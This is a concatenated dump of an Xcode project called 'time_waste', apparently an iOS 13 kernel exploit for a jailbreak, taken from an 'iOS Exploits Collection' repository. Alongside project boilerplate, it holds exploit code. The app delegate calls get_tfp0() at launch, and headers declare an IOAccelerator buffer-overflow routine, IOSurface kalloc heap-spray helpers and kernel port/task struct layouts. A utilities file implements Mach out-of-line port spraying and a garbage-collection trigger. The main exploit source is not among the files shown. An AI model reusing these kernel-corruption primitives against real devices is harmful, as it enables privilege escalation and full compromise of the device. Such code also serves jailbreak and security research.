https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist:
--------------------------------------------------------------------------------
1 |
2 |
6 |
7 |
9 |
21 |
22 |
23 |
25 |
37 |
38 |
39 |
41 |
53 |
54 |
55 |
57 |
69 |
70 |
71 |
73 |
85 |
86 |
87 |
89 |
101 |
102 |
103 |
104 |
105 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | time_waste.xcscheme_^#shared#^_
8 |
9 | orderHint
10 | 0
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/AppDelegate.h:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.h
3 | // time_waste
4 | //
5 | // Created by Jake James on 2/22/20.
6 | // Copyright © 2020 Jake James. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface AppDelegate : UIResponder
12 |
13 | @property (strong, nonatomic) UIWindow *window;
14 |
15 | @end
16 |
17 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/AppDelegate.m:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.m
3 | // time_waste
4 | //
5 | // Created by Jake James on 2/22/20.
6 | // Copyright © 2020 Jake James. All rights reserved.
7 | //
8 |
9 | #import "AppDelegate.h"
10 | #import "exploit.h"
11 |
12 | @interface AppDelegate ()
13 |
14 | @end
15 |
16 | @implementation AppDelegate
17 |
18 |
19 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
20 |
21 | get_tfp0();
22 |
23 | return YES;
24 | }
25 |
26 | @end
27 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "iphone",
5 | "size" : "20x20",
6 | "scale" : "2x"
7 | },
8 | {
9 | "idiom" : "iphone",
10 | "size" : "20x20",
11 | "scale" : "3x"
12 | },
13 | {
14 | "idiom" : "iphone",
15 | "size" : "29x29",
16 | "scale" : "2x"
17 | },
18 | {
19 | "idiom" : "iphone",
20 | "size" : "29x29",
21 | "scale" : "3x"
22 | },
23 | {
24 | "idiom" : "iphone",
25 | "size" : "40x40",
26 | "scale" : "2x"
27 | },
28 | {
29 | "idiom" : "iphone",
30 | "size" : "40x40",
31 | "scale" : "3x"
32 | },
33 | {
34 | "idiom" : "iphone",
35 | "size" : "60x60",
36 | "scale" : "2x"
37 | },
38 | {
39 | "idiom" : "iphone",
40 | "size" : "60x60",
41 | "scale" : "3x"
42 | },
43 | {
44 | "idiom" : "ipad",
45 | "size" : "20x20",
46 | "scale" : "1x"
47 | },
48 | {
49 | "idiom" : "ipad",
50 | "size" : "20x20",
51 | "scale" : "2x"
52 | },
53 | {
54 | "idiom" : "ipad",
55 | "size" : "29x29",
56 | "scale" : "1x"
57 | },
58 | {
59 | "idiom" : "ipad",
60 | "size" : "29x29",
61 | "scale" : "2x"
62 | },
63 | {
64 | "idiom" : "ipad",
65 | "size" : "40x40",
66 | "scale" : "1x"
67 | },
68 | {
69 | "idiom" : "ipad",
70 | "size" : "40x40",
71 | "scale" : "2x"
72 | },
73 | {
74 | "idiom" : "ipad",
75 | "size" : "76x76",
76 | "scale" : "1x"
77 | },
78 | {
79 | "idiom" : "ipad",
80 | "size" : "76x76",
81 | "scale" : "2x"
82 | },
83 | {
84 | "idiom" : "ipad",
85 | "size" : "83.5x83.5",
86 | "scale" : "2x"
87 | },
88 | {
89 | "idiom" : "ios-marketing",
90 | "size" : "1024x1024",
91 | "scale" : "1x"
92 | }
93 | ],
94 | "info" : {
95 | "version" : 1,
96 | "author" : "xcode"
97 | }
98 | }
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/Assets.xcassets/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "info" : {
3 | "version" : 1,
4 | "author" : "xcode"
5 | }
6 | }
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/Base.lproj/Main.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/IOAccelerator_stuff.h:
--------------------------------------------------------------------------------
1 | //
2 | // IOAccelerator_stuff.h
3 | // time_waste
4 | //
5 | // Created by Jake James on 2/22/20.
6 | // Copyright © 2020 Jake James. All rights reserved.
7 | //
8 |
9 | #ifndef IOAccelerator_stuff_h
10 | #define IOAccelerator_stuff_h
11 |
12 | #import
13 | #import
14 | #import
15 | #import
16 |
17 | #include "IOSurface_stuff.h"
18 |
19 | #define IOAccelCommandQueue2_type 4
20 | #define IOAccelSharedUserClient2_type 2
21 | #define IOAccelSharedUserClient2_create_shmem_selector 5
22 | #define IOAccelSharedUserClient2_destroy_shmem_selector 6
23 | #define IOAccelCommandQueue2_set_notification_port_selector 0
24 | #define IOAccelCommandQueue2_submit_command_buffers_selector 1
25 |
26 | struct IOAccelDeviceShmemData {
27 | void *data;
28 | uint32_t length;
29 | uint32_t shmem_id;
30 | };
31 |
32 | struct IOAccelCommandQueueSubmitArgs_Header {
33 | uint32_t field_0;
34 | uint32_t count;
35 | };
36 |
37 | struct IOAccelCommandQueueSubmitArgs_Command {
38 | uint32_t command_buffer_shmem_id;
39 | uint32_t segment_list_shmem_id;
40 | uint64_t notify_1;
41 | uint64_t notify_2;
42 | };
43 |
44 | struct IOAccelSegmentListHeader {
45 | uint32_t field_0;
46 | uint32_t field_4;
47 | uint32_t segment_count;
48 | uint32_t length;
49 | };
50 |
51 | struct IOAccelSegmentResourceList_ResourceGroup {
52 | uint32_t resource_id[6];
53 | uint8_t field_18[48];
54 | uint16_t resource_flags[6];
55 | uint8_t field_54[2];
56 | uint16_t resource_count;
57 | };
58 |
59 | struct IOAccelSegmentResourceListHeader {
60 | uint64_t field_0;
61 | uint32_t kernel_commands_start_offset;
62 | uint32_t kernel_commands_end_offset;
63 | int total_resources;
64 | uint32_t resource_group_count;
65 | struct IOAccelSegmentResourceList_ResourceGroup resource_groups[];
66 | };
67 |
68 | struct IOAccelKernelCommand {
69 | uint32_t type;
70 | uint32_t size;
71 | };
72 |
73 | struct IOAccelKernelCommand_CollectTimeStamp {
74 | struct IOAccelKernelCommand command;
75 | uint64_t timestamp;
76 | };
77 |
78 | kern_return_t IOAccelSharedUserClient2_create_shmem(size_t size, struct IOAccelDeviceShmemData *shmem);
79 | kern_return_t IOAccelSharedUserClient2_destroy_shmem(uint32_t shmem_id);
80 | kern_return_t IOAccelCommandQueue2_set_notification_port(mach_port_t notification_port);
81 | kern_return_t IOAccelCommandQueue2_submit_command_buffers(const struct IOAccelCommandQueueSubmitArgs_Header *submit_args, size_t size);
82 |
83 | int alloc_shmem(uint32_t buffer_size, struct IOAccelDeviceShmemData *cmdbuf, struct IOAccelDeviceShmemData *seglist);
84 | int overflow_n_bytes(uint32_t buffer_size, int n, struct IOAccelDeviceShmemData *cmdbuf, struct IOAccelDeviceShmemData *seglist);
85 | int make_buffer_readable_by_kernel(void *buffer, uint64_t n_pages);
86 |
87 | int init_IOAccelerator(void);
88 | void term_IOAccelerator(void);
89 |
90 | extern io_connect_t IOAccelCommandQueue2;
91 | extern io_connect_t IOAccelSharedUserClient2;
92 | extern io_service_t IOGraphicsAccelerator2;
93 |
94 | #endif /* IOAccelerator_stuff_h */
95 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/IOKit/OSMessageNotification.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. Please obtain a copy of the License at
10 | * http://www.opensource.apple.com/apsl/ and read it before using this
11 | * file.
12 | *
13 | * The Original Code and all software distributed under the License are
14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
18 | * Please see the License for the specific language governing rights and
19 | * limitations under the License.
20 | *
21 | * @APPLE_LICENSE_HEADER_END@
22 | */
23 | /*
24 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved.
25 | *
26 | * HISTORY
27 | *
28 | */
29 |
30 | #ifndef __OS_OSMESSAGENOTIFICATION_H
31 | #define __OS_OSMESSAGENOTIFICATION_H
32 |
33 | #ifdef __cplusplus
34 | extern "C" {
35 | #endif
36 |
37 | #include
38 | #include "IOReturn.h"
39 |
40 | enum {
41 | kFirstIOKitNotificationType = 100,
42 | kIOServicePublishNotificationType = 100,
43 | kIOServiceMatchedNotificationType = 101,
44 | kIOServiceTerminatedNotificationType = 102,
45 | kIOAsyncCompletionNotificationType = 150,
46 | kIOServiceMessageNotificationType = 160,
47 | kLastIOKitNotificationType = 199
48 | };
49 |
50 | enum {
51 | kOSNotificationMessageID = 53,
52 | kOSAsyncCompleteMessageID = 57,
53 | kMaxAsyncArgs = 16
54 | };
55 |
56 | enum {
57 | kIOAsyncReservedIndex = 0,
58 | kIOAsyncReservedCount,
59 |
60 | kIOAsyncCalloutFuncIndex = kIOAsyncReservedCount,
61 | kIOAsyncCalloutRefconIndex,
62 | kIOAsyncCalloutCount,
63 |
64 | kIOMatchingCalloutFuncIndex = kIOAsyncReservedCount,
65 | kIOMatchingCalloutRefconIndex,
66 | kIOMatchingCalloutCount,
67 |
68 | kIOInterestCalloutFuncIndex = kIOAsyncReservedCount,
69 | kIOInterestCalloutRefconIndex,
70 | kIOInterestCalloutServiceIndex,
71 | kIOInterestCalloutCount
72 | };
73 |
74 | enum {
75 | kOSAsyncRefCount = 8,
76 | kOSAsyncRefSize = 32
77 | };
78 | typedef natural_t OSAsyncReference[kOSAsyncRefCount];
79 |
80 | struct OSNotificationHeader {
81 | vm_size_t size; /* content size */
82 | natural_t type;
83 | OSAsyncReference reference;
84 |
85 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
86 | unsigned char content[];
87 | #else
88 | unsigned char content[0];
89 | #endif
90 | };
91 |
92 | struct IOServiceInterestContent {
93 | natural_t messageType;
94 | void * messageArgument[1];
95 | };
96 |
97 | struct IOAsyncCompletionContent {
98 | IOReturn result;
99 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
100 | void * args[];
101 | #else
102 | void * args[0];
103 | #endif
104 | };
105 |
106 | #ifndef __cplusplus
107 | typedef struct OSNotificationHeader OSNotificationHeader;
108 | typedef struct IOServiceInterestContent IOServiceInterestContent;
109 | typedef struct IOAsyncCompletionContent IOAsyncCompletionContent;
110 | #endif
111 |
112 | #ifdef __cplusplus
113 | }
114 | #endif
115 |
116 | #endif /* __OS_OSMESSAGENOTIFICATION_H */
117 |
118 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/IOKit/Readme.md:
--------------------------------------------------------------------------------
1 | IOKit for iOS SDK7.0
2 | =======
3 |
4 | 
5 |
6 | 在某些时候可能会用到IOKit来获取一些信息,但是将sdk从6.x升级到7.0的sdk之后就会发现那个libIOKit.dylib找不到了。晚上的办法是将6.x的sdk复制到7.0的sdk下,或者创建一个符号链接。
7 |
8 | 其实还有另外的一个解决办法,在7.0之后这个东西只是不是dylib了,而是成了一个framework。在这个目录下
9 |
10 | /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS7.0.sdk/System/Library/Frameworks/IOKit.framework,所以只需要将工程中的iokit用framework替换掉就可以了。另外这个并没有头文件,如果要用也得自己去提取相关的头文件。可以用classdump来生成。我用的是apple xun中的头文件,效果是一样的,这里整理了一下,需要的直接放入工程目录下引入IOKitLib.h就可以了。
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/IOSurface_stuff.h:
--------------------------------------------------------------------------------
1 | //
2 | // IOSurface_stuff.h
3 | // time_waste
4 | //
5 | // Created by Jake James on 2/22/20.
6 | // Copyright © 2020 Jake James. All rights reserved.
7 | //
8 |
9 | #ifndef IOSurface_stuff_h
10 | #define IOSurface_stuff_h
11 |
12 | #import
13 | #import
14 | #import
15 |
16 | #import
17 | #import
18 |
19 | #import "offsets.h"
20 |
21 | #define IOSurfaceRootUserClient_create_surface_selector 6
22 | #define IOSurfaceRootUserClient_set_value_selector 9
23 | #define IOSurfaceRootUserClient_get_value_selector 10
24 | #define IOSurfaceRootUserClient_remove_value_selector 11
25 | #define IOSurfaceRootUserClient_increment_use_count_selector 14
26 | #define IOSurfaceRootUserClient_decrement_use_count_selector 15
27 | #define IOSurfaceRootUserClient_set_notify_selector 17
28 |
29 | struct IOSurfaceFastCreateArgs {
30 | uint64_t address;
31 | uint32_t width;
32 | uint32_t height;
33 | uint32_t pixel_format;
34 | uint32_t bytes_per_element;
35 | uint32_t bytes_per_row;
36 | uint32_t alloc_size;
37 | };
38 |
39 | struct IOSurfaceLockResult {
40 | uint8_t _pad1[0x18];
41 | uint32_t surface_id;
42 | uint8_t _pad2[0xdd0-0x18-0x4];
43 | };
44 |
45 | struct IOSurfaceValueArgs {
46 | uint32_t surface_id;
47 | uint32_t field_4;
48 | union {
49 | uint32_t binary[0];
50 | char xml[0];
51 | };
52 | };
53 |
54 | struct IOSurfaceValueResultArgs {
55 | uint32_t field_0;
56 | };
57 |
58 |
59 | enum {
60 | kOSSerializeDictionary = 0x01000000U,
61 | kOSSerializeArray = 0x02000000U,
62 | kOSSerializeSet = 0x03000000U,
63 | kOSSerializeNumber = 0x04000000U,
64 | kOSSerializeSymbol = 0x08000000U,
65 | kOSSerializeString = 0x09000000U,
66 | kOSSerializeData = 0x0a000000U,
67 | kOSSerializeBoolean = 0x0b000000U,
68 | kOSSerializeObject = 0x0c000000U,
69 |
70 | kOSSerializeTypeMask = 0x7F000000U,
71 | kOSSerializeDataMask = 0x00FFFFFFU,
72 |
73 | kOSSerializeEndCollection = 0x80000000U,
74 |
75 | kOSSerializeBinarySignature = 0x000000d3U,
76 | };
77 |
78 | int init_IOSurface(void);
79 | void term_IOSurface(void);
80 |
81 | int IOSurface_setValue(struct IOSurfaceValueArgs *args, size_t args_size);
82 | int IOSurface_getValue(struct IOSurfaceValueArgs *args, int args_size, struct IOSurfaceValueArgs *output, size_t *out_size);
83 | int IOSurface_removeValue(struct IOSurfaceValueArgs *args, size_t args_size);
84 |
85 | int IOSurface_remove_property(uint32_t key);
86 | int IOSurface_kalloc(void *data, uint32_t size, uint32_t kalloc_key);
87 | int IOSurface_kalloc_spray(void *data, uint32_t size, int count, uint32_t kalloc_key);
88 | int IOSurface_empty_kalloc(uint32_t size, uint32_t kalloc_key);
89 |
90 | int IOSurface_kmem_alloc(void *data, uint32_t size, uint32_t kalloc_key);
91 | int IOSurface_kmem_alloc_spray(void *data, uint32_t size, int count, uint32_t kalloc_key);
92 |
93 | extern uint32_t pagesize;
94 | extern io_connect_t IOSurfaceRoot;
95 | extern io_service_t IOSurfaceRootUserClient;
96 | extern uint32_t IOSurface_ID;
97 |
98 | #endif /* IOSurface_stuff_h */
99 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | $(PRODUCT_BUNDLE_PACKAGE_TYPE)
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 | LSRequiresIPhoneOS
22 |
23 | UILaunchStoryboardName
24 | LaunchScreen
25 | UIMainStoryboardFile
26 | Main
27 | UIRequiredDeviceCapabilities
28 |
29 | armv7
30 |
31 | UISupportedInterfaceOrientations
32 |
33 | UIInterfaceOrientationPortrait
34 | UIInterfaceOrientationLandscapeLeft
35 | UIInterfaceOrientationLandscapeRight
36 |
37 | UISupportedInterfaceOrientations~ipad
38 |
39 | UIInterfaceOrientationPortrait
40 | UIInterfaceOrientationPortraitUpsideDown
41 | UIInterfaceOrientationLandscapeLeft
42 | UIInterfaceOrientationLandscapeRight
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/ViewController.h:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.h
3 | // time_waste
4 | //
5 | // Created by Jake James on 2/22/20.
6 | // Copyright © 2020 Jake James. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface ViewController : UIViewController
12 |
13 |
14 | @end
15 |
16 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/ViewController.m:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.m
3 | // time_waste
4 | //
5 | // Created by Jake James on 2/22/20.
6 | // Copyright © 2020 Jake James. All rights reserved.
7 | //
8 |
9 | #import "ViewController.h"
10 |
11 | @interface ViewController ()
12 |
13 | @end
14 |
15 | @implementation ViewController
16 |
17 | - (void)viewDidLoad {
18 | [super viewDidLoad];
19 | // Do any additional setup after loading the view.
20 | }
21 |
22 |
23 | @end
24 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/exploit.h:
--------------------------------------------------------------------------------
1 | //
2 | // exploit.h
3 | // time_waste
4 | //
5 | // Created by Jake James on 2/22/20.
6 | // Copyright © 2020 Jake James. All rights reserved.
7 | //
8 |
9 | #ifndef expoit_h
10 | #define expoit_h
11 |
12 | #import
13 | #import
14 | #import
15 | #import
16 | #import
17 |
18 | #import "IOAccelerator_stuff.h"
19 | #import "IOSurface_stuff.h"
20 | #import "offsets.h"
21 | #import "exploit_utilities.h"
22 | #import "kernel_memory.h"
23 |
24 | int get_tfp0(void);
25 |
26 | #define IO_BITS_ACTIVE 0x80000000
27 | #define IOT_PORT 0
28 | #define IKOT_NONE 0
29 | #define IKOT_TASK 2
30 | #define IKOT_HOST_PRIV 4
31 | #define IKOT_CLOCK 25
32 | #define IKOT_IOKIT_CONNECT 29
33 |
34 | typedef volatile struct {
35 | uint32_t ip_bits;
36 | uint32_t ip_references;
37 | struct {
38 | uint64_t data;
39 | uint64_t type;
40 | } ip_lock; // spinlock
41 | struct {
42 | struct {
43 | struct {
44 | uint32_t flags;
45 | uint32_t waitq_interlock;
46 | uint64_t waitq_set_id;
47 | uint64_t waitq_prepost_id;
48 | struct {
49 | uint64_t next;
50 | uint64_t prev;
51 | } waitq_queue;
52 | } waitq;
53 | uint64_t messages;
54 | uint32_t seqno;
55 | uint32_t receiver_name;
56 | uint16_t msgcount;
57 | uint16_t qlimit;
58 | uint32_t pad;
59 | } port;
60 | uint64_t klist;
61 | } ip_messages;
62 | uint64_t ip_receiver;
63 | uint64_t ip_kobject;
64 | uint64_t ip_nsrequest;
65 | uint64_t ip_pdrequest;
66 | uint64_t ip_requests;
67 | uint64_t ip_premsg;
68 | uint64_t ip_context;
69 | uint32_t ip_flags;
70 | uint32_t ip_mscount;
71 | uint32_t ip_srights;
72 | uint32_t ip_sorights;
73 | } kport_t;
74 |
75 | typedef struct {
76 | struct {
77 | uint64_t data;
78 | uint32_t reserved : 24,
79 | type : 8;
80 | uint32_t pad;
81 | } lock; // mutex lock
82 | uint32_t ref_count;
83 | uint32_t active;
84 | uint32_t halting;
85 | uint32_t pad;
86 | uint64_t map;
87 | } ktask_t;
88 |
89 | #define WQT_QUEUE 0x2
90 | #define _EVENT_MASK_BITS ((sizeof(uint32_t) * 8) - 7)
91 |
92 | union waitq_flags {
93 | struct {
94 | uint32_t /* flags */
95 | waitq_type:2, /* only public field */
96 | waitq_fifo:1, /* fifo wakeup policy? */
97 | waitq_prepost:1, /* waitq supports prepost? */
98 | waitq_irq:1, /* waitq requires interrupts disabled */
99 | waitq_isvalid:1, /* waitq structure is valid */
100 | waitq_turnstile_or_port:1, /* waitq is embedded in a turnstile (if irq safe), or port (if not irq safe) */
101 | waitq_eventmask:_EVENT_MASK_BITS;
102 | };
103 | uint32_t flags;
104 | };
105 |
106 | #endif /* exploit_h */
107 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/exploit_utilities.c:
--------------------------------------------------------------------------------
1 | //
2 | // exploit_utilities.c
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #import "exploit_utilities.h"
10 |
11 | mach_port_t new_mach_port() {
12 | mach_port_t port = MACH_PORT_NULL;
13 | kern_return_t ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
14 | if (ret) {
15 | printf("[-] failed to allocate port\n");
16 | return MACH_PORT_NULL;
17 | }
18 |
19 | mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
20 | if (ret) {
21 | printf("[-] failed to insert right\n");
22 | mach_port_destroy(mach_task_self(), port);
23 | return MACH_PORT_NULL;
24 | }
25 |
26 | mach_port_limits_t limits = {0};
27 | limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
28 | ret = mach_port_set_attributes(mach_task_self(), port, MACH_PORT_LIMITS_INFO, (mach_port_info_t)&limits, MACH_PORT_LIMITS_INFO_COUNT);
29 | if (ret) {
30 | printf("[-] failed to increase queue limit\n");
31 | mach_port_destroy(mach_task_self(), port);
32 | return MACH_PORT_NULL;
33 | }
34 |
35 | return port;
36 | }
37 |
38 | kern_return_t send_message(mach_port_t destination, void *buffer, mach_msg_size_t size) {
39 | mach_msg_size_t msg_size = sizeof(struct simple_msg) + size;
40 | struct simple_msg *msg = malloc(msg_size);
41 |
42 | memset(msg, 0, sizeof(struct simple_msg));
43 |
44 | msg->hdr.msgh_remote_port = destination;
45 | msg->hdr.msgh_local_port = MACH_PORT_NULL;
46 | msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
47 | msg->hdr.msgh_size = msg_size;
48 |
49 | memcpy(&msg->buf[0], buffer, size);
50 |
51 | kern_return_t ret = mach_msg(&msg->hdr, MACH_SEND_MSG, msg_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
52 | if (ret) {
53 | printf("[-] failed to send message\n");
54 | mach_port_destroy(mach_task_self(), destination);
55 | free(msg);
56 | return ret;
57 | }
58 | free(msg);
59 | return KERN_SUCCESS;
60 | }
61 |
62 | struct simple_msg* receive_message(mach_port_t source, mach_msg_size_t size) {
63 | mach_msg_size_t msg_size = sizeof(struct simple_msg) + size;
64 | struct simple_msg *msg = malloc(msg_size);
65 | memset(msg, 0, sizeof(struct simple_msg));
66 |
67 | kern_return_t ret = mach_msg(&msg->hdr, MACH_RCV_MSG, 0, msg_size, source, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
68 | if (ret) {
69 | printf("[-] failed to receive message\n");
70 | return NULL;
71 | }
72 |
73 | return msg;
74 | }
75 |
76 | int send_ool_ports(mach_port_t where, mach_port_t target_port, int count, int disposition) {
77 | kern_return_t ret;
78 |
79 | mach_port_t* ports = malloc(sizeof(mach_port_t) * count);
80 | for (int i = 0; i < count; i++) {
81 | ports[i] = target_port;
82 | }
83 |
84 | struct ool_msg* msg = (struct ool_msg*)calloc(1, sizeof(struct ool_msg));
85 |
86 | msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
87 | msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg);
88 | msg->hdr.msgh_remote_port = where;
89 | msg->hdr.msgh_local_port = MACH_PORT_NULL;
90 | msg->hdr.msgh_id = 0x41414141;
91 |
92 | msg->body.msgh_descriptor_count = 1;
93 |
94 | msg->ool_ports.address = ports;
95 | msg->ool_ports.count = count;
96 | msg->ool_ports.deallocate = 0;
97 | msg->ool_ports.disposition = disposition;
98 | msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
99 | msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY;
100 |
101 | ret = mach_msg(&msg->hdr, MACH_SEND_MSG|MACH_MSG_OPTION_NONE, msg->hdr.msgh_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
102 |
103 | free(msg);
104 | free(ports);
105 |
106 | if (ret) {
107 | printf("[-] Failed to send OOL message: 0x%x (%s)\n", ret, mach_error_string(ret));
108 | return KERN_FAILURE;
109 | }
110 |
111 | return 0;
112 | }
113 |
114 | // Ian Beer
115 | mach_msg_size_t message_size_for_kalloc_size(mach_msg_size_t kalloc_size) {
116 | return ((3 * kalloc_size) / 4) - 0x74;
117 | }
118 |
119 | void trigger_gc() {
120 | const int gc_ports_cnt = 1000;
121 | int gc_ports_max = gc_ports_cnt;
122 | mach_port_t gc_ports[gc_ports_cnt] = { 0 };
123 |
124 | uint32_t body_size = (uint32_t)message_size_for_kalloc_size(16384) - sizeof(struct simple_msg); // 1024
125 | uint8_t *body = (uint8_t*)malloc(body_size);
126 | memset(body, 0x41, body_size);
127 |
128 | for (int i = 0; i < gc_ports_cnt; i++) {
129 | uint64_t t0, t1;
130 |
131 | t0 = mach_absolute_time();
132 |
133 | gc_ports[i] = new_mach_port();
134 | send_message(gc_ports[i], body, body_size);
135 |
136 | t1 = mach_absolute_time();
137 |
138 | if (t1 - t0 > 1000000) {
139 | printf("[+] got gc at %d -- breaking\n", i);
140 | gc_ports_max = i;
141 | break;
142 | }
143 | }
144 |
145 | for (int i = 0; i < gc_ports_max; i++) {
146 | mach_port_destroy(mach_task_self(), gc_ports[i]);
147 | }
148 |
149 | sched_yield();
150 | sleep(1);
151 | }
152 |
153 |
--------------------------------------------------------------------------------
/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/exploit_utilities.h:
--------------------------------------------------------------------------------
1 | //
2 | // exploit_utilities.h
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #ifndef exploit_utilities_h
10 | #define exploit_utilities_h
11 |
12 | #import
13 | #import
14 | #import
15 | #import
16 | #import
17 | #import
18 | #import
19 | #import
20 |
21 | #import "IOSurface_stuff.h"
22 |
23 | struct ool_msg {
24 | mach_msg_header_t hdr;
25 | mach_msg_body_t body;
26 | mach_msg_ool_ports_descriptor_t ool_ports;
27 | };
28 |
29 | struct simple_msg {
30 | mach_msg_header_t hdr;
31 | char buf[0];
32 | };
33 |
34 | typedef struct {
35 | mach_msg_bits_t msgh_bits;
36 | mach_msg_size_t msgh_size;
37 | uint64_t msgh_remote_port;
38 | uint64_t msgh_local_port;
39 | mach_port_name_t msgh_voucher_port;
40 | mach_msg_id_t msgh_id;
41 | } kern_mach_msg_header_t;
42 |
43 | struct ool_kmsg {
44 | kern_mach_msg_header_t hdr;
45 | mach_msg_body_t body;
46 | mach_msg_ool_ports_descriptor_t ool_ports;
47 | };
48 |
49 | struct simple_kmsg {
50 | kern_mach_msg_header_t hdr;
51 | char buf[0];
52 | };
53 |
54 | mach_port_t new_mach_port(void);
55 | kern_return_t send_message(mach_port_t destination, void *buffer, mach_msg_size_t size);
56 | struct simple_msg* receive_message(mach_port_t source, mach_msg_size_t size);
57 | int send_ool_ports(mach_port_t where, mach_port_t target_port, int count, int disposition);
58 |
